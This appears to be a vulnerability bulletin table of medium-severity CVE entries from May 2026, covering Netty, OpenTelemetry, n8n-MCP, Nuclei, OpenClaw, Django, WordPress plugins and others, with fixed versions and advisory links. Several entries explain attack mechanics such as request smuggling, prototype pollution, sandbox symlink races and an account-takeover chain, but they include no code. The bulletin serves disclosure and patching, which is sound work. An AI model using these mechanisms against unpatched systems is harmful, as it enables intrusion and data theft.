| netty--netty | Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests, leading to HTTP request smuggling or desynchronization on the HTTP side and request injection on the RTSP side. This issue is fixed in versions 4.2.13.Final and 4.1.133.Final. | 2026-05-06 | 5.3 | CVE-2026-41417 | https://github.com/netty/netty/security/advisories/GHSA-v8h7-rr48-vmmv |
| open-telemetry--opentelemetry-dotnet-contrib | OpenTelemetry.Resources.Azure is the .NET resource detector for Azure environments. In versions 1.15.0-beta.1 and earlier, the AzureVmMetaDataRequestor class makes HTTP requests to the Azure VM instance metadata service and reads the response body into memory without any size limit. An attacker who controls the configured endpoint, or who can intercept traffic to it via a man-in-the-middle attack, can return an arbitrarily large response body. This causes unbounded heap allocation in the consuming process, leading to high transient memory pressure, garbage-collection stalls, or an OutOfMemoryException that terminates the process. As a workaround, disable the Azure VM resource detector or use network-level controls such as firewall rules, mTLS, or a service mesh to prevent man-in-the-middle attacks on the Azure VM instance metadata endpoint. This issue is fixed in version 1.15.1-beta.1, which streams responses rather than buffering them entirely in memory and ignores responses larger than 4 MiB. | 2026-05-06 | 5.9 | CVE-2026-41483 | https://github.com/open-telemetry/opentelemetry-dotnet-contrib/security/advisories/GHSA-vc24-j8c5-2vw4 https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4121 |
| open-telemetry--opentelemetry-dotnet-contrib | OpenTelemetry.Exporter.OneCollector is a .NET exporter that sends telemetry to a OneCollector back-end over HTTP. In versions 1.15.0 and earlier, when a request to the configured back-end or collector results in an unsuccessful HTTP 4xx or 5xx response, the HttpJsonPostTransport class reads the entire response body into memory with no upper bound on the number of bytes consumed in order to include the error response in operator logs. An attacker who controls the configured endpoint, or who can intercept traffic to it via a man-in-the-middle attack, can return an arbitrarily large response body. This causes unbounded heap allocation in the consuming process, leading to high transient memory pressure, garbage-collection stalls, or an OutOfMemoryException that terminates the process. As a workaround, use network-level controls such as firewall rules, mTLS, or a service mesh to prevent man-in-the-middle attacks on the configured back-end or collector endpoint. This issue is fixed in version 1.15.1, which limits the number of bytes read from the response body in an error condition to 4 MiB. | 2026-05-06 | 5.3 | CVE-2026-41484 | https://github.com/open-telemetry/opentelemetry-dotnet-contrib/security/advisories/GHSA-55m9-299j-53c7 https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4117 |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to version 2.47.11, when n8n-mcp runs in HTTP transport mode, incoming requests to the POST /mcp endpoint had their request metadata written to server logs regardless of the authentication outcome. In deployments where logs are collected, forwarded to external systems, or viewable outside the request trust boundary (shared log storage, SIEM pipelines, support/ops access), this can result in disclosure of: bearer tokens from the Authorization header, per-tenant API keys from the, x-n8n-key header in multi-tenant setups, JSON-RPC request payloads sent to the MCP endpoint. Access control itself was not bypassed - unauthenticated requests were correctly rejected with 401 Unauthorized - but sensitive values from those rejected requests could still be persisted in logs. This issue has been patched in version 2.47.11. | 2026-05-08 | 5.3 | CVE-2026-41495 | https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-pfm2-2mhg-8wpx https://github.com/czlonkowski/n8n-mcp/releases/tag/v2.47.11 |
| enchant97--note-mark | Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw "JOIN books ..." clauses used by the note and asset queries. This issue has been patched in version 0.19.3. | 2026-05-04 | 5.3 | CVE-2026-41572 | https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf https://github.com/enchant97/note-mark/releases/tag/v0.19.3 |
| projectdiscovery--nuclei | Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's expression evaluation engine makes it possible for a malicious target server to inject and execute supported DSL expressions. This happens when HTTP response data containing helper/function syntax gets reused by multi-step templates. If the -env-vars / -ev option is explicitly enabled, this can expose host environment variables. That option is off by default, so standard configurations are not affected by the information disclosure risk. This issue has been patched in version 3.8.0. | 2026-05-08 | 5.3 | CVE-2026-41645 | https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-jm34-66cf-qpvr https://github.com/projectdiscovery/nuclei/pull/7221 https://github.com/projectdiscovery/nuclei/pull/7321 https://github.com/projectdiscovery/nuclei/commit/6c803c74d193f85f8a6d9803ce493fd302cad0eb https://github.com/projectdiscovery/nuclei/commit/d2217320162d5782ca7cb95bef9dda17063818f3 https://github.com/projectdiscovery/nuclei/releases/tag/v3.8.0 |
| projectdiscovery--nuclei | Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require() function, bypassing the default local file access restriction. This issue has been patched in version 3.8.0. | 2026-05-08 | 5.5 | CVE-2026-41646 | https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-29rg-wmcw-hpf4 https://github.com/projectdiscovery/nuclei/pull/7332 https://github.com/projectdiscovery/nuclei/commit/6f2ade6a9b427c284c15a43445f9c7f055e60e5d |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, Role::stopMembership() does not verify whether removing a user from the administrator role leaves zero administrators. The deprecated Membership::stopMembership() contains this safety check, but the current code path bypasses it. Any administrator can remove the last remaining other administrator, locking the entire system out of administrative access. The exploit does not require concurrent requests; sequential removals produce the same result. This issue has been patched in version 5.0.9. | 2026-05-07 | 5.2 | CVE-2026-41662 | https://github.com/Admidio/admidio/security/advisories/GHSA-c7xm-r6vj-8vg6 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, a user holding the PERM_EDIT_USERS permission (intended for general user-profile editing) can read and modify the notification subscriptions of any other user, including admins, by sending a single POST request. This is a sibling of CVE-2025-48472's notification authorization bypass - the prior fix did not cover this code path. A non-admin attacker can silently disable an admin's email/browser/mobile notifications, suppressing security alerts and conversation-assignment notices. This issue has been patched in version 1.8.217. | 2026-05-07 | 5.4 | CVE-2026-41903 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-f489-qxv6-gvgg https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 |
| givanz--Vvveb | Vvveb before 1.0.8.2 contains an information disclosure vulnerability in the cron controller that allows unauthenticated attackers to retrieve the application's secret cron key. Attackers can access the cron controller without authentication and retrieve the exposed secret key from the response, enabling them to trigger scheduled task execution outside of the intended schedule. | 2026-05-07 | 5.3 | CVE-2026-41928 | https://github.com/givanz/Vvveb/commit/517bc09faf44136e72de391aacc8b90a706f7ae7 https://www.vulncheck.com/advisories/vvveb-information-disclosure-via-cron-controller |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains an information disclosure vulnerability that allows unauthenticated attackers to obtain sensitive server information by triggering unhandled exceptions in the password-reset module. Attackers can access the admin password-reset endpoint to trigger a fatal error caused by a missing namespace import, which exposes the absolute server file path, internal class namespaces, line numbers, and source code excerpts through the debug exception handler rendered to unauthenticated requests. | 2026-05-06 | 5.3 | CVE-2026-41931 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-xgvg-r47g-786r https://www.vulncheck.com/advisories/vvveb-information-disclosure-via-debug-exception-handler |
| novafacile--novagallery | novaGallery is a php image gallery. Prior to version 2.1.1, a path traversal vulnerability has been identified in novaGallery. This allows unauthenticated users to read image files outside the intended gallery root directory. This issue has been patched in version 2.1.1. | 2026-05-08 | 5.3 | CVE-2026-42028 | https://github.com/novafacile/novagallery/security/advisories/GHSA-wv5j-98c7-frm9 https://github.com/novafacile/novagallery/commit/46fe7b0f79f429e18c8cff3f92360c4513732ba6 https://github.com/novafacile/novagallery/releases/tag/v2.1.1 |
| EvoMap--evolver | Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into Object.prototype. The vulnerability exists in the _applyUpdate() and _updateRecord() functions which use Object.assign() to merge user-controlled data without filtering dangerous keys like __proto__, constructor, or prototype. This issue has been patched in version 1.69.3. | 2026-05-04 | 5.2 | CVE-2026-42077 | https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4 https://github.com/EvoMap/evolver/releases/tag/v1.69.3 |
| GreycLab--CImg | CImg Library is a C++ library for image processing. Prior to commit c3aacf5, the nb_colors field read from the BMP file header is used directly to compute an allocation size without validating it against the remaining file size. A crafted BMP file with a large nb_colors value triggers an out-of-memory condition, crashing any application that uses CImg to load untrusted BMP files. This issue has been patched via commit c3aacf5. | 2026-05-04 | 5.5 | CVE-2026-42146 | https://github.com/GreycLab/CImg/security/advisories/GHSA-g54r-qmgx-c6fv https://github.com/GreycLab/CImg/issues/477 https://github.com/GreycLab/CImg/commit/c3aacf5b96ac1e54b7af1957c6737dbf3949f6d3 https://github.com/GreycLab/CImg/releases/tag/v.3.7.5 |
| WeblateOrg--wlc | wlc is a Weblate command-line client using Weblate's REST API. Prior to version 2.0.0, the HTML output format in wlc embeds API response data into HTML without escaping, allowing cross-site scripting when the output is rendered in a browser. This issue has been patched in version 2.0.0. | 2026-05-08 | 5.1 | CVE-2026-42150 | https://github.com/WeblateOrg/wlc/security/advisories/GHSA-gx2m-mcc2-r4p3 https://github.com/WeblateOrg/wlc/pull/1327 https://github.com/WeblateOrg/wlc/commit/0f3e58f6d7457b05d48ef40f579a172c4c8b8469 https://github.com/WeblateOrg/wlc/releases/tag/2.0.0 |
| suitenumerique--people | People is an application to handle users and teams, and distribute permissions across La Suite. Prior to version 1.25.0, a user holding the Administrator role on a mail domain could send a crafted invitation request to promote any existing user (including users with no current domain access) to the Owner role. The exploit requires a single authenticated HTTP request and grants full domain ownership immediately, without any acceptance step from the target. This issue has been patched in version 1.25.0. | 2026-05-08 | 5.5 | CVE-2026-42185 | https://github.com/suitenumerique/people/security/advisories/GHSA-42cf-rv2h-v8rf https://github.com/suitenumerique/people/commit/6a51b96d8e907483fa8fc489d8714cc35fb4099b https://github.com/suitenumerique/people/releases/tag/v1.25.0 |
| redwoodjs--sdk | RedwoodSDK is a server-first React framework. From version 1.0.0-beta.50 to before version 1.2.3, server actions in rwsdk apply HTTP method enforcement but no origin validation. A request originating from a different origin that the browser treats as same-site can invoke a server action with the victim's session cookie attached. This issue has been patched in version 1.2.3. | 2026-05-08 | 5.3 | CVE-2026-42190 | https://github.com/redwoodjs/sdk/security/advisories/GHSA-m2m6-cff5-3w7c https://github.com/redwoodjs/sdk/releases/tag/v1.2.3 |
| useplunk--plunk | Plunk is an open-source email platform built on top of AWS SES. Prior to version 0.9.0, a stored cross-site scripting (XSS) vulnerability exists in the campaign management feature, where the email body content created by authenticated project members is stored and later rendered in the admin dashboard using React's dangerouslySetInnerHTML without any HTML sanitization. This allows a lower-privileged member to embed malicious scripts in a campaign's email body that execute in the context of any admin or other member who views the campaign, potentially enabling session hijacking or unauthorized actions on their behalf. This issue has been patched in version 0.9.0. | 2026-05-08 | 5.4 | CVE-2026-42192 | https://github.com/useplunk/plunk/security/advisories/GHSA-mjqc-qrv3-24hq https://github.com/useplunk/plunk/releases/tag/v0.9.0 |
| G-Research--ParquetSharp | ParquetSharp is a .NET library for reading and writing Apache Parquet files. From version 18.1.0 to before version 23.0.0.1, DecimalConverter.ReadDecimal makes a stackalloc using what might be an attacker-supplied value. If an attacker declares a decimal column with some unreasonable width, this could lead to a stack overflow. In a service environment, this would potentially take down a service. This affects applications using ParquetSharp to read untrusted Parquet files in a network service. This issue has been patched in version 23.0.0.1. | 2026-05-07 | 5.3 | CVE-2026-42241 | https://github.com/G-Research/ParquetSharp/security/advisories/GHSA-rrjr-v56m-ww88 https://github.com/G-Research/ParquetSharp/releases/tag/23.0.0.1 |
| solidtime-io--solidtime | solidtime is an open-source time-tracking app. In version 0.12.0, the PUT /api/v1/organizations/{organization}/time-entries/{timeEntry} API accepts a route-bound timeEntry from another organization when the caller has time-entries:update:all in the URL organization, allowing a known foreign time-entry UUID to be modified and rebound to objects in the caller's organization. This issue has been patched in version 0.12.1. | 2026-05-08 | 5.8 | CVE-2026-42279 | https://github.com/solidtime-io/solidtime/security/advisories/GHSA-pmf9-pxq9-ccwr https://github.com/solidtime-io/solidtime/commit/b73aa543fdf5b61c37447307ab7277451296832c https://github.com/solidtime-io/solidtime/releases/tag/v0.12.1 |
| OpenStack--Horizon | An issue was discovered in OpenStack Horizon 25.6 and 25.7 before 25.7.3. There is a write operation to the session storage backend before authentication and thus storage can be exhausted by unauthenticated requests. This is a regression of the CVE-2014-8124 fix. | 2026-05-05 | 5.3 | CVE-2026-43002 | https://bugs.launchpad.net/horizon/+bug/2150331 https://www.openwall.com/lists/oss-security/2026/05/05/7 https://security.openstack.org/ossa/OSSA-2026-009.html |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.10 before 2026.4.14 contain a missing authorization vulnerability in the Microsoft Teams SSO invoke handler that fails to apply sender allowlist checks. Attackers can bypass sender authorization by sending SSO invoke requests that are processed without proper validation, allowing unauthorized access to Teams SSO signin functionality. | 2026-05-05 | 5.3 | CVE-2026-43572 | GitHub Security Advisory (GHSA-gc9r-867r-j85f) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.10 < 2026.4.14 - Missing Sender Authorization in Microsoft Teams SSO Invoke Handler |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.10 before 2026.4.14 fail to persist session context during delivery queue recovery for media replay. Attackers can exploit recovered queued outbound media to bypass group tool policy enforcement and weaken channel media restrictions after service restart or recovery. | 2026-05-06 | 5.3 | CVE-2026-43583 | GitHub Security Advisory (GHSA-r77c-2cmr-7p47) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.10 < 2026.4.14 - Loss of Group Tool-Policy Context in Delivery Queue Recovery |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In versions 3.8.15 and prior, the getConstants() IPC handler in src/app/lib/ipc-sync.js serialises the entire process.env object and sends it to the renderer. The data is stored as window.pre.env and is accessible from any JavaScript running in the renderer (e.g., via the DevTools console or a compromised webview context). An attacker who achieves any JavaScript execution within the renderer can trivially exfiltrate these secrets to a remote server, leading to cloud account compromise, supply chain attacks, and lateral movement. At time of publication, there are no publicly available patches. | 2026-05-08 | 5.5 | CVE-2026-43942 | https://github.com/electerm/electerm/security/advisories/GHSA-37j4-88rp-2f6h |
| NixOS--Nix | An issue was discovered in Nix before 2.34.7. Writing to arbitrary files can occur via "nix-prefetch-url --unpack" or "nix store prefetch-file --unpack" directory traversal. The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 (introduced in 2.24.7); | 2026-05-05 | 5.3 | CVE-2026-44029 | https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-lix-and-nix/77407 https://www.openwall.com/lists/oss-security/2026/05/04/33 https://github.com/NixOS/nix/security/advisories/GHSA-gr92-w2r5-qw5p |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains a time-of-check/time-of-use race condition in OpenShell sandbox filesystem writes that allows attackers to redirect writes outside the intended mount root. Attackers can exploit symlink swaps during filesystem operations to bypass sandbox restrictions and write files outside the local mount root. | 2026-05-06 | 5.3 | CVE-2026-44112 | GitHub Security Advisory (GHSA-wppj-c6mr-83jj) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Symlink Swap Race Condition in OpenShell FS Bridge Writes |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains a time-of-check/time-of-use race condition in the OpenShell filesystem bridge that allows attackers to read files outside the intended mount root. Attackers can exploit symlink swaps during filesystem operations to bypass sandbox restrictions and access unauthorized file contents. | 2026-05-06 | 5.3 | CVE-2026-44113 | GitHub Security Advisory (GHSA-5h3g-6xhh-rg6p) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Time-of-Check/Time-of-Use Race Condition in OpenShell FS Bridge |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.20 contains a server-side request forgery vulnerability in QQBot direct media upload that skips URL validation. Attackers can bypass SSRF protections by sending crafted image URLs to uploadC2CMedia and uploadGroupMedia endpoints to relay unintended requests. | 2026-05-06 | 5.8 | CVE-2026-44117 | GitHub Security Advisory (GHSA-c4qg-j8jg-42q5) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.20 - Server-Side Request Forgery in QQBot Direct Media Upload |
| ZTE--ZXCLOUD iRAI | ZTE Cloud PC client uSmartView contains a DLL hijacking vulnerability; since uSmartViewServiceAgent.exe runs with SYSTEM privileges, successful hijacking enables local arbitrary code execution, privilege escalation, and memory corruption.contains a DLL hijacking vulnerability; since uSmartViewServiceAgent.exe runs with SYSTEM privileges, successful hijacking enables local arbitrary code execution, privilege escalation, and memory corruption. | 2026-05-07 | 5.7 | CVE-2026-44406 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/8107253322107965601 |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.4.0, prior to zebra-chain version 7.0.0, and prior to zebra-network version 6.0.0, several inbound deserialization paths in Zebra allocated buffers sized against generic transport or block-size ceilings before the tighter protocol or consensus limits were enforced. An unauthenticated or post-handshake peer could therefore force the node to preallocate and parse for orders of magnitude more data than the protocol intended, across headers messages, equihash solutions in block headers, Sapling spend vectors in V5/V4 transactions, and coinbase script bytes in blocks. This issue has been patched in zebrad version 4.4.0, zebra-chain version 7.0.0, and zebra-network version 6.0.0. | 2026-05-08 | 5.3 | CVE-2026-44500 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-438q-jx8f-cccv |
| publishpress--Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories | The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wrapper' attribute of the [futureaction] shortcode in all versions up to, and including, 4.10.0. This is due to insufficient input sanitization on the wrapper attribute. The plugin uses esc_html() to escape the value, but esc_html() only encodes HTML entities and does not prevent attribute injection when the value is used as an HTML tag name in a sprintf() call. An attacker can inject event handler attributes via spaces in the wrapper value. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Since it is also possible for administrators to make this functionality available to lower-privileged users, this introduces the possibility of abuse by contributors. | 2026-05-05 | 5.5 | CVE-2026-5247 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9acf80aa-8354-4430-9836-18fa17854521?source=cve https://plugins.trac.wordpress.org/browser/post-expirator/trunk/src/Modules/Expirator/Controllers/ShortcodeController.php#L173 https://plugins.trac.wordpress.org/browser/post-expirator/tags/4.9.4/src/Modules/Expirator/Controllers/ShortcodeController.php#L173 https://github.com/publishpress/publishpress-future/releases |
| djangoproject--Django | An issue was discovered in 6.0 before 6.0.5 and 5.2 before 5.2.14. ASGI requests with a missing or understated `Content-Length` header can bypass the `FILE_UPLOAD_MAX_MEMORY_SIZE` limit, potentially loading large files into memory and causing service degradation. As a reminder, Django expects a limit to be configured at the web server level rather than solely relying on `FILE_UPLOAD_MAX_MEMORY_SIZE`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Kyle Agronick for reporting this issue. | 2026-05-05 | 5.3 | CVE-2026-5766 | Django security archive Django releases announcements Django security releases issued: 6.0.5 and 5.2.14 |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator Forms plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.51.1. This is due to the `processRequest()` method in `Forminator_Admin_Module_Edit_Page` (admin/abstracts/class-admin-module-edit-page.php) dispatching sensitive module-management actions - including export, delete, clone, delete-entries, publish/draft, and bulk variants - after only a nonce check, without ever verifying that the current user holds the `manage_forminator_modules` capability. The nonce used (`forminator_form_request`) is unconditionally embedded in the global `forminatorData` JavaScript object and localized on every Forminator admin page, including Templates and Reports pages accessible to users who explicitly lack module-management permissions. Because `processRequest()` is invoked during the `admin_menu` action hook - which fires before WordPress enforces page-level capability checks - a user whose Forminator role is restricted to Templates or Reports can craft a valid POST request targeting any published module and successfully trigger the vulnerable actions. This makes it possible for authenticated attackers with subscriber-level access (or any custom low-privilege Forminator role) to export the complete internal configuration of arbitrary forms/polls/quizzes (including notification routing, integration credentials, and conditional logic), delete modules, delete all submissions/votes, clone modules, or bulk-change publish/draft status. | 2026-05-07 | 5.3 | CVE-2026-6222 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e860aa70-b8ef-4b2a-a035-b01efce30a79?source=cve https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L1008 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L1008 https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L951 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L951 https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/classes/class-admin-data.php#L141 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/classes/class-admin-data.php#L141 https://plugins.trac.wordpress.org/browser/forminator/tags/1.52/admin/abstracts/class-admin-module-edit-page.php#L988 |
| www[.]pgbouncer[.]org--PgBouncer | A possible null pointer reference in PgBouncer before 1.25.2 could lead to a crash, if a server sends an error response without SQLSTATE field. | 2026-05-09 | 5.9 | CVE-2026-6666 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| Velocidex--velociraptor | An authorization bypass (CWE-639) in the GetUserRoles gRPC API endpoint in Velocidex Velociraptor below version 0.76.5 allows any authenticated low-privilege user to retrieve the complete ACL policy (roles and permissions) for any user across all organizations by supplying targeted Name and Org parameters via a network request. | 2026-05-06 | 5 | CVE-2026-7573 | https://docs.velociraptor.app/announcements/advisories/cve-2026-7573/ |
| latepoint--LatePoint Calendar Booking Plugin for Appointments and Events | The LatePoint plugin for WordPress is vulnerable to Account Takeover via Weak Password Recovery Mechanism in the unauthenticated guest booking flow in versions up to, and including, 5.5.0 This is due to the save_connected_wordpress_user() function propagating a LatePoint customer's email address to its linked WordPress user account via wp_update_user() without any ownership verification, combined with the guest booking flow's ability to overwrite an existing customer's email through phone-based merge without authentication. This makes it possible for unauthenticated attackers to overwrite the email address of a non-super-admin WordPress user account that is not yet linked to a LatePoint customer, enabling full account takeover by subsequently triggering the standard WordPress password-reset flow to the attacker-controlled address granted the plugin is configured with WordPress user integration enabled, phone-based contact merging, and customer authentication disabled. Administrator accounts on single-site installs are not affected. | 2026-05-09 | 5.3 | CVE-2026-7652 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bdaa32cd-a148-4554-9fd5-f5b0a5b2d1c3?source=cve https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.2/lib/helpers/steps_helper.php#L1940 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.2/lib/helpers/customer_helper.php#L238 https://plugins.trac.wordpress.org/browser/latepoint/trunk/latepoint.php#L1165 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/latepoint.php#L1165 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/steps_helper.php#L1972 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/steps_helper.php#L1972 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/steps_helper.php#L1940 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/steps_helper.php#L1940 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/customer_helper.php#L238 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/customer_helper.php#L238 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.2/latepoint.php#L1165 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.2/lib/helpers/steps_helper.php#L1972 https://plugins.trac.wordpress.org/changeset/3522933/latepoint/trunk/latepoint.php https://plugins.trac.wordpress.org/changeset?old_path=%2Flatepoint/tags/5.5.0&new_path=%2Flatepoint/tags/5.5.1 |
| PrefectHQ--prefect | A vulnerability was detected in PrefectHQ prefect up to 3.6.21. This impacts the function endswith of the file /api/health of the component Health Check API. Performing a manipulation results in improper authentication. The attack is possible to be carried out remotely. The exploit is now public and may be used. Upgrading to version 3.6.22 will fix this issue. The patch is named e21617125335025b4b27e7d6f0ca028e8e8f3b79. Upgrading the affected component is recommended. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-04 | 5.3 | CVE-2026-7722 | VDB-360898 | PrefectHQ prefect Health Check API health endswith improper authentication VDB-360898 | CTI Indicators (IOB, IOC, IOA) Submit #807255 | PrefectHQ Perfect <=3.6.21 Improper Authentication https://gist.github.com/nedlir/f576abbb0e491dc9bb7e106c140dda04 https://github.com/PrefectHQ/prefect/pull/21063 https://github.com/PrefectHQ/prefect/commit/e21617125335025b4b27e7d6f0ca028e8e8f3b79 https://github.com/PrefectHQ/prefect/releases/tag/3.6.22 https://github.com/PrefectHQ/prefect/ |
| PrefectHQ--prefect | A vulnerability has been found in PrefectHQ prefect up to 3.6.28.dev1. Affected by this vulnerability is the function validate_restricted_url of the component Webhook/Notification. The manipulation leads to time-of-check time-of-use. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 3.6.28.dev2 addresses this issue. The identifier of the patch is 7c70ac54a5e101431d83b9f2681ec88d5e0021ed. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-04 | 5 | CVE-2026-7724 | VDB-360900 | PrefectHQ prefect Webhook/Notification validate_restricted_url toctou VDB-360900 | CTI Indicators (IOB, IOC, IOA) Submit #807303 | PerfectHQ Perfect >=3.6.26 Time-of-check Time-of-use https://linear.app/prefect/issue/OSS-7874/fix-dns-rebinding-toctou-bypass-in-validate-restricted-url https://github.com/PrefectHQ/prefect/pull/21591 https://gist.github.com/nedlir/fa99777e8989414585d08c3625bf044a https://github.com/PrefectHQ/prefect/commit/7c70ac54a5e101431d83b9f2681ec88d5e0021ed https://github.com/PrefectHQ/prefect/releases/tag/3.6.28.dev2 https://github.com/PrefectHQ/prefect/ |
| osrg--GoBGP | A vulnerability has been found in osrg GoBGP up to 4.3.0. This impacts the function SRv6L3ServiceAttribute.DecodeFromBytes of the file pkg/packet/bgp/prefix_sid.go of the component SRv6 L3 Service. Such manipulation of the argument data leads to denial of service. The attack may be performed from remote. Upgrading to version 4.4.0 will fix this issue. The name of the patch is f9f7b55ec258e514be0264871fa645a2c3edad11. You should upgrade the affected component. | 2026-05-04 | 5.3 | CVE-2026-7734 | VDB-360909 | osrg GoBGP SRv6 L3 Service prefix_sid.go SRv6L3ServiceAttribute.DecodeFromBytes denial of service VDB-360909 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807581 | GoBGP 4.3.0 Infinite Loop https://github.com/osrg/gobgp/commit/f9f7b55ec258e514be0264871fa645a2c3edad11 https://github.com/osrg/gobgp/releases/tag/v4.4.0 https://github.com/osrg/gobgp/ |
| osrg--GoBGP | A vulnerability was identified in osrg GoBGP up to 4.3.0. Affected by this issue is the function BMPPeerUpNotification.ParseBody/BMPStatisticsReport.ParseBody of the file pkg/packet/bmp/bmp.go of the component BMP Parser. The manipulation leads to out-of-bounds read. The attack can be initiated remotely. Upgrading to version 4.4.0 can resolve this issue. The identifier of the patch is bc77597d42335c78464bc8e15a471d887bbdf260. Upgrading the affected component is recommended. | 2026-05-04 | 5.3 | CVE-2026-7737 | VDB-360912 | osrg GoBGP BMP Parser bmp.go BMPStatisticsReport.ParseBody out-of-bounds VDB-360912 | CTI Indicators (IOB, IOC, IOA) Submit #807605 | osrg GoBGP <= 4.3.0 Out-of-Bounds Read https://github.com/osrg/gobgp/commit/bc77597d42335c78464bc8e15a471d887bbdf260 https://github.com/osrg/gobgp/releases/tag/v4.4.0 https://github.com/osrg/gobgp/ |
| runZero--Platform | An issue that could allow a dashboard configuration to be viewed from outside of the authorized organization scope has been resolved. This is an instance of CWE-269: Improper Privilege Management, and has an estimated CVSS score of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0, Medium). This issue was fixed in version v4.0.260416.0 of the runZero Platform. | 2026-05-05 | 5 | CVE-2026-7778 | https://www.runzero.com/advisories/runzero-platform-dashboard-configuration-exposure-cve-2026-7778/ https://help.runzero.com/docs/release-notes/#402604160 |
